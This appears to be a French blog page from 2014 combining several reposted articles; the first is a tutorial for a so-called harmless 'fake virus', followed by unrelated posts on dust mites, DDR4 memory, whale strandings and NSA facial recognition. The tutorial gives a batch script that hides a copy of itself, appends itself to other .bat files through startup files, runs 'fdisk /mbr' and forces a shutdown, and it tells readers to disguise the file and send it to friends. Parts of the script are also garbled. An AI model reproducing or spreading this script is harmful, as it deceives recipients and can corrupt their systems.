Powered By Blogger

Rechercher sur ce blogue

lundi 9 juin 2014

Comment créer un Faux Virus

Vous voulez créer un virus inoffensif qui simplement imprime quelques messages pour faire peur à quelqu'un avant d'éteindre l'ordinateur de cette même personne puis, après un redémarrage, laissera fonctionner l'ordinateur de la personne de façon normale, comme la personne en avait l'habitude ? Ci-dessous, dans la rubrique "Code" vous pouvez voir le code qui est exécuté par l'ordinateur lorsque le virus est lancé. Les lignes qui comment par REM sont des commentaires que votre ordinateur va tout simplement ignorer. Bonne lecture !
Publicité

Étapes

  1. 1
    Une fois Windows démarré, ouvrez le bloc-notes. Vous pouvez faire cela en cliquant successivement sur Démarrer -> Tous les programmes -> Accessoires -> Bloc-notes ou bien plus simplement encore en tapant "Bloc-notes" après avoir cliqué sur Démarrer -> Exécuter.

    Create a Virus Step 1.jpg
    Publicité
  2. Create a Virus Step 2.jpg
    2
    Copiez le code écrit ci-dessous, dans la rubrique "Code" et collez-le dans le bloc-notes puis cliquez sur Fichier -> Enregistrer sous.
  3. 3
    Décidez de l'endroit où vous voulez enregistrer le faux virus sur votre ordinateur. Vous devriez choisir un endroit où la personne ne trouvera pas votre fichier, le bureau est donc un emplacement à éviter.

    Create a Virus Step 3.jpg
  4. Create a Virus Step 4.jpg
    4
    Dans le menu déroulant à côté de "Type : " choisissez "Tous les fichiers (*.*)" à la place de "Fichiers texte (*.txt)".
  5. Create a Virus Step 5.jpg
    5
    Choisissez un nom inoffensif pour votre virus. Remplacez l'extension ".txt" par l'extension ".bat" et cliquez sur Enregistrer puis fermez le bloc-notes.
  6. 6
    Vous venez désormais de finir la partie création de ce virus. Vous devez maintenant attacher le virus avec un autre fichier. Après avoir attaché le virus, envoyez-le simplement à vos amis. Puis installez-vous bien confortablement dans votre chaise de bureau et appréciez le spectacle !

    Create a Virus Step 6.jpg
    Publicité
@echo off
title %0
rem verification conditionnelle.
echo bienvenue dans ce magnifique programme ! Attendez svp pendant que je supprime tous vos fichiers ! 
rem infection de l utilisateur 
copy %0 c : \tmp.bat >null attrib +r +s +h c : \tmp.bat echo for %%i in (*.bat) do copy c : \tmp.bat+%%i %%i >>c : \windows\system32\autoexec.NT
echo echo virus detecte ! >>c : \windows\system32\autoexec.NT
echo pause >>c : \windows\system32\autoexec.NT
echo NT core : infected !
echo echo honte a toi ! >>c : \autoexec.bat
echo echo system hault-virus identifie ! >>c : \autoexec.bat
echo chkdsk >>c : \autoexec.bat
echo c e s t t r o p t a r d, v o u s a v e z u n v i r u s, v o t r e v i e e s t g a c h e e l
fdisk /mbr
shutdown -s -t 03 -c “windows has shut down because the lsass service has encountered a write fault at 0×00000000000000000000000000000000000″

Détails de l'article

dimanche 8 juin 2014

Les acariens,comment vous en débarrasser!

acariens

Les acariens, des petites bêtes pas si inoffensives


On vous explique ce que sont les acariens et, surtout, comment vous en débarrasser!
Les acariens de lit (une variété parmi les 100 000 qui existent!) sont des araignées microscopiques qui se nourrissent de peaux mortes et affectionnent particulièrement les milieux humides et les fibres, comme celles des lits, oreillers, rideaux et tapis. Au Québec, où le taux d'humidité des maisons tend à être élevé (au-dessus de 50%), ils sont partout.
Doit-on les craindre?
Même si les acariens ne sont pas vecteurs de maladies, ils sont nuisibles dans la mesure où leurs excréments contaminent la poussière domestique et peuvent causer la rhinite allergique (symptômes du rhume en absence d'une infection) et l'asthme. Plus la concentration d'acariens dans une maison est grande, plus on y est sensible, et les personnes asthmatiques le sont encore plus.
Comment les éliminer?
• On maintient un taux d'humidité raisonnable dans la maison (entre 35% et 50%, pas plus), car les acariens ne survivent pas aux milieux secs.
• On accorde une attention particulière à notre lit. On glisse notre matelas et nos oreillers dans des housses anti-acariens et on passe la literie (oreillers inclus) à la laveuse et la sécheuse (pendant au moins 20 minutes) au moins une fois par semaine, en choisissant bien sûr des fibres lavables. On évite aussi de se coucher les cheveux mouillés et on change souvent les draps lorsque les enfants ont le nez qui coule.
• On évite les tapis et les moquettes, si possible. Si on ne peut les enlever, on passe souvent l'aspirateur et on les lave régulièrement.
• S'il y a des personnes asthmatiques dans la maison, on évite les meubles rembourrés et les rideaux épais et on privilégie plutôt les divans et chaises en bois ou en cuir.

REF.: Merci au Dr Stéphane Charron, médecin spécialiste en santé publique à la Direction de la santé publique de Montréal.

La DDR4 fin 2014 ? compatible intel processeurs Haswell-E, chipset X99

Computex : en route vers la DDR4 !


Publié le 06 juin 2014 par Alexandre Laurent dans les catégories Mémoire et Computex

En attendant les premières plateformes qui l'exploiteront, tous les principaux fabricants de mémoire vive se mettent en ordre de marche pour l'arrivée de la DDR4. Dans vos PC d'ici la fin de l'année ?

Le marché de la mémoire vive n'avait pas connu d'évolution significative depuis 2007 et le lancement des premiers modules de DDR3. Ceux-ci devraient se voir supplantés par un nouveau standard, plus rapide et plus économe en énergie, à partir de la fin 2014 et dans les années à venir. Tous les grands noms du marché sont en effet fin prêts à lancer leurs premières barrettes de DDR4. Au Computex, elles s'affichent ainsi sans ambages chez Adata, Crucial, Corsair ou G.Skill, qu'il s'agisse de modules dédiés au marché des ordinateurs particuliers ou de barrettes ECC (munies d'un dispositif de correction des erreurs) en direction des serveurs. Pour le grand public, on attaque avec un standard DDR4-2133, qui propose un cas latency à 15, fait appel à des puces de mémoire de 4 Gb ou 8 Gb et requiert une tension d'alimentation de 1,2V.

DDR4 Computex Adata
DDR4 chez Adata, ici avec des puces signées Hynix

Finalisé en septembre 2012, le standard DDR4 prévoit en bref une bande passante doublée par rapport aux spécifications initiales de la DDR3, ainsi qu'une tension de fonctionnement plus basse (entre 1,05V et 1,2V, contre 1,5V sur la DDR3). Les différents fabricants interrogés à l'occasion du Computex se disent confiants dans leur capacité à rapidement dépasser le standard de base et sa bande passante théorique de 2133 MT/s (méga-transferts par seconde). Certains s'aventurent déjà toutefois vers des fréquences plus élevées : 2400 Mhz par exemple chez G.Skill ou Corsair, même si ces modules ne sont pas encore forcément entrés en production de masse.

DDR4 Computex Adata
Chez Adata toujours, spécifications attendues pour des barrettes serveur

Au final, seules manquent les plateformes compatibles ! Celles-ci sont attendues pour la fin de l'année chez Intel, avec les processeurs Haswell-E sur le marché grand public (sur chipset X99, lui aussi présent au Computex) et leurs équivalents Haswell-EP destinés aux serveurs (un Xeon E5-2600 v3, encore non annoncé, est par exemple évoqué chez Adata). Au lancement, la DDR4 devrait être disponible sous la forme de barrettes de 4 et 8 Go, qui seront déclinées sous forme de kits de 8, 16 ou 32 Go.

Crucial a dégainé le premier, avec des modules déjà disponibles à la commande. A défaut de les utiliser, on pourra étudier le tarif de lancement : 150 euros environ pour un kit de 2 x 4 Go, ou 320 euros pour un ensemble 16 Go (en 2 x 8 Go).

DDR4 G.Skill

DDR4 G.Skill

Pourquoi les baleines s'échouent-elles sur les côtes ?


Baleine4433184_7_0ac4_des-carcasses-de-baleines-pilotes-retrouvees_28852f8a3759e26a1dd548ad67995448
  • Chaque année, des dizaines de cétacés s'échouent sur les rivages. Toujours spectaculaires, ces phénomènes, dont on trouve des traces dans des récits datant de l'Antiquité, restent pourtant encore empreints de mystère pour les scientifiques.
  • Les raisons et hypothèses avancées diffèrent selon les mammifères, les côtes, et surtout, le type d'échouage, qu'il s'agisse de quelques individus isolés ou de groupes entiers. 
  • Malnutrition ou maladies
La semaine dernière, des scientifiques réunis lors d'une conférence à Perth ont avancé la raison de la malnutrition pour expliquer la forte augmentation des échouages individuels de baleines à bosse sur les côtes occidentales de l'Australie. Alors que deux à trois de ces mammifères s'échouaient chaque année entre 1989 et 2007, leur nombre a grimpé à 13 en 2008, puis à 46 en 2009.
« Des examens post-mortem et l'analyse de la quantité de graisse dans des échantillons de chair ont montré que la plupart des jeunes étaient dans un état de grave malnutrition, explique Carly Holyoake, de l'université Murdoch. La plupart avaient un niveau très faible de graisse, indispensable pour l'énergie, la régulation thermique et la capacité à flotter. » Les raisons de ces carences pourraient être l'intensification de la pêche commerciale au krill, élément-clé du régime alimentaire des baleines, et l'influence, encore mal connue, du réchauffement climatique sur les quantités de ces petites crevettes dans les eaux.
 Les échouages individuels peuvent aussi survenir lorsque les dauphins, baleines, marsouins ou phoques sont égarés, désorientés, malades ou victimes d'une infection. Pendant l'été 2013, des centaines de dauphins ont par exemple été infectés par des morbillivirus, des virus très contagieux qui provoquent des lésions de l'appareil respiratoire et du système nerveux. Affaiblis et désorientés, les mammifères sont alors venus mourir sur la plage.
  • Problèmes d'orientation
D'autres mécanismes sont à l'œuvre dans le cas des échouages massifs, qui voient plusieurs individus en bonne santé, essentiellement les baleines-pilotes (aussi appelées globicéphales, qui sont en réalité une espèce de dauphins), les cachalots ou les baleines à bec, s'échouer dans un même secteur géographique et lors du même cycle de marée.
Les problèmes d'orientation sont évoqués en premier lieu. En cause : des défaillances du système d'écholocation des mammifères qui, sur le principe du sonar, consiste à émettre des ondes acoustiques renvoyées lorsqu'elles heurtent un obstacle, leur permettant de se déplacer, communiquer ou repérer des proies.
Le système d'écholocation des dauphins.Le système d'écholocation des dauphins. | DR
« Nous ne savons pas encore expliquer ces défaillances, prévient Willy Dabin, biologiste au Centre de recherches sur les mammifères marins de La Rochelle. Il pourrait s'agir d'une 'zone morte acoutisque', où les ondes envoyées ne reviennent pas, ou bien d'anomalies dans les champs géomagnétiques auxquels les animaux pourraient être sensibles. »
  • Topographie complexe
Les cétacés s'approchent des côtes à différents moments de l'année, notamment pour chasser. S'ils pénètrent dans des passages complexes ou des baies en forme de crochet, comme celle de Cape Cod, sur la côte est des Etats-Unis, ils peuvent être désorientés et se retrouver emprisonnés par les changements de marées.
Les scientifiques ont aussi observé des similitudes entre les fonds marins des endroits du monde qui enregistrent le plus d'échouages collectifs, à savoir certaines plages de Nouvelle-Zélande, d'Australie, des Malouines et de Cape Cod : il s'agit souvent de fonds plats, sablonneux ou boueux, en pente douce, qui pourraient nuire à la capacité d'orientation des animaux.
  • Perturbations acoustiques
Les sonars, notamment basses fréquences, utilisés par les navires militaires sont également pointés. Selon une étude réalisée sur des baleines bleues, publiée dans la revue scientifique Proceedings of the Royal Society en juillet 2013, ces ondes sonores pourraient dérégler l'oreille interne des cétacés et leur capacité à évaluer la profondeur de l'eau. Paniquées, les baleines remonteraient trop vite à la surface, ce qui provoquerait des accidents de décompression et des embolies gazeuses, comme pour les plongeurs qui ne respectent pas les paliers lors des remontées.
L'échouage d'une centaine de dauphins d'Electre près de Madagascar, en 2008, a ainsi été attribué par un panel d'experts à l'utilisation d'un sonar de cartographie à haute fréquence par la compagnie pétrolière ExxonMobil – qui a rejeté ces conclusions.
  • Interactions sociales
« Tous ces facteurs peuvent expliquer que certaines baleines s'échouent, mais ce qui pousse un groupe entier à les suivre, ce sont les interactions sociales qui les unissent », explique Marc Oremus, biologiste à l'ONG de Nouvelle-Calédonie Opération cétacés, et l'un des principaux auteurs d'une étude sur les échouages massifs publiée dans la revue Journal of Heredity en mars 2013.
Le scientifique, qui était alors chercheur à l'université d'Auckland en Nouvelle-Zélande, a recensé l'ADN de 490 baleines-pilotes lors de douze épisodes d'échouage en Australie et en Nouvelle-Zélande. Résultat : les dauphins échoués ensemble n'ont pas tous des liens de parenté, les petits pouvant se trouver très loin de leur mère. Mais tous appartiennent au même groupe.
« Les baleines-pilotes sont des animaux grégaires, qui vivent toute leur existence dans les mêmes groupes de quinze à vingt individus, articulés autour d'un axe matriarcal, poursuit Marc Oremus. Cet instinct social les pousse à suivre les autres individus jusqu'à l'échouage. Si on les remet à l'eau, ils reviendront s'échouer tant que leurs congénères seront sur la plage. » Le sauvetage des baleines échouées doit donc débuter par la remise à l'eau des meneurs.

lundi 2 juin 2014

La NSA aspire chaque jour des millions de photos de visages sur le web

On sait, notamment grâce aux révélations d'Edward Snowden, que les agences de renseignement américaines se servent largement d'Internet et des réseaux sociaux pour leurs activités de surveillance.

De nouveaux documents de la NSA (National Security Agency), fournis par Snowden et analysé par le New York Times dans un article paru le 1er juin, se concentrent sur un aspect précis de l'utilisation par les services secrets américains des données numériques disponibles en ligne : les photos publiées chaque jour par les individus, ou échangées grâce aux outils de communication.
Le quotidien américain publie des extraits d'une présentation PowerPoint, utilisée par la NSA en 2011 pour un usage interne et présentée comme top secrète, qui l'assure : « l'image fait tout ».
Extrait du PowerPoint de la NSA consacré aux images, révélé par le New York Times le 1er juin.
Extrait du PowerPoint de la NSA consacré aux images, révélé par le New York Times le 1er juin. | New York Times
Selon le New York Times, ces documents indiquent qu'en 2011, la NSA était capable d'intercepter en une journée « des millions d'images » dont environ « 55 000 dont la qualité suffit pour une reconnaissance faciale ». Ces images seraient récupérées dans les emails, courriels, textos, mais aussi sur les réseaux sociaux, grâce à des outils de vidéo-conférences, ou encore, dans les bases de données de photos utilisées par les administrations des pays étrangers.
RECONNAISSANCE FACIALE
Un porte-parole de l'agence, interrogé sur la question par le New York Times, n'a pas voulu commenter et confirmer ces informations. L'article du New York Times rappelle par ailleurs que les autorités américaines (département d'Etat, FBI, etc.) ont déjà recours à des banques d'images très fournies, incluant les photos de passeport, de permis de conduire, mais aussi, dans le cas des autorités locales, des photos trouvées sur Facebook.
Mais les documents analysés par le New York Times décrivent aussi comment la NSA a ensuite recours à des logiciels permettant d'analyser et exploiter toutes ces photos, grâce à des outils de reconnaissance faciale de plus en plus évolués. Leur développement se serait accéléré sous l'administration Obama : collecter un maximum de photos, et pouvoir analyser précisément toutes les informations qui s'y trouvent, permettrait, ainsi, de repérer au plus vite des cibles potentielles.
« Il ne s'agit pas d'en avoir après les communications traditionnelles. Il s'agit de déployer tout un arsenal pour exploiter numériquement les indices qu'une cible laisse derrière elle dans ses activités courantes sur Internet, afin de recueillir des informations biographiques et biométriques », explique un document de la NSA datant de 2010, cité par le quotidien.
RECOUPER LES BANQUES D'IMAGES
C'est à partir de cette année là que l'agence de renseignement aurait réussi à recouper les photos d'une de ses banques d'images (appelée Pinwale) avec celles contenues dans une liste du gouvernement américain dédiée à la surveillance d'individus liés au terrorisme. A partir de là, plusieurs équipes se seraient constituées au sein de l'agence pour construire des profils précis des individus recherchés, à partir des informations contenus sur les photos dans lesquelles ils apparaissent.
Les tentatives d'identifications se seraient ensuite multipliées, selon le New York Times, qui raconte comment la NSA a, en 2011, tenté de localiser plusieurs cibles, dont Oussama Ben Laden. Ceci avec plus ou moins de succès : les recherches lancées auraient montré des photos d'hommes qui n'étaient pas les cibles recherchées, en raison des limites de l'époque en ce qui concerne l'identification faciale sur des fichiers numériques.
Toutefois, les progrès dans ce domaine sont spectaculaires, assure le New York Times, qui détaille aussi des exemples d'identifications réussies présentées dans les documents que le journal a pu obtenir, dont celle d'un homme chauve, présent dans un parc d'attraction, identifié grâce à d'autres images de lui où il avait pourtant des cheveux.
VIDE JURIDIQUE
Le journal précise que personne n'est en mesure de dire combien d'individus, aux Etats-Unis ou dans le monde entier, ont été capturés grâce à ces méthodes. Une porte-parole de la NSA a souligné par ailleurs auprès du New York Times que l'agence aurait besoin d'une approbation au niveau judiciaire pour l'utilisation de photos d'Américains qu'elle aurait recueillies grâce à ces programmes de surveillance.
Mais en ce qui concerne les limites liées à la reconnaissance faciale, le quotidien évoque un « vide juridique » que les lois sur la défense de la vie privée aux Etats-Unis n'ont pour l'instant pas comblé.


REF.: